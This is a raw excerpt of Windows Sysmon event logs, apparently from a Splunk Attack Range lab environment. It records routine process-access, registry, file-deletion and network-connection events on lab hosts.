09:21:47.212{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.212{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.134{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:47.134{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\LastUpdatedDWORD (0xffffffff) 13241300x80000000000000001055673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:47.134{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\TranscodedImageCountDWORD (0x00000001) 10341000x80000000000000001055672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.134{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.134{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.118{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\shsvcs.dll+11f99|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x101068C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\shsvcs.dll+11f27|c:\windows\system32\shsvcs.dll+11ba6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.102{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:48.931{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B05679AA715DC6C959FB833FE893A96F,SHA256=A64A781DE9C7749D64BA5364BB11E27F24F81B4BE657E951B0527C604B222DE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.931{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:47.044{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54205-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.900{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B71B3A038C96785D80B92603096750,SHA256=B4B3D75AF14AE6EF7E246F87A9E54F36477F0AA3031F4C24A363560DE6874035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.837{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+18aac|C:\Windows\SYSTEM32\psmserviceexthost.dll+e47e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e517|C:\Windows\SYSTEM32\psmserviceexthost.dll+e22a|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e78|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.837{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+40681|C:\Windows\System32\combase.dll+40cad 10341000x80000000000000001055842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.837{5EBD8912-8D2A-6151-9600-00000000FD01}46324860C:\Windows\Explorer.EXE{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+40681|C:\Windows\System32\combase.dll+40cad 10341000x80000000000000001055841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.837{5EBD8912-8D29-6151-8D00-00000000FD01}41364220C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.837{5EBD8912-8D29-6151-8D00-00000000FD01}41364220C:\Windows\system32\sihost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:48.822{5EBD8912-8D29-6151-8C00-00000000FD01}34084044C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000980882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:44.999{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62199-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001055838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 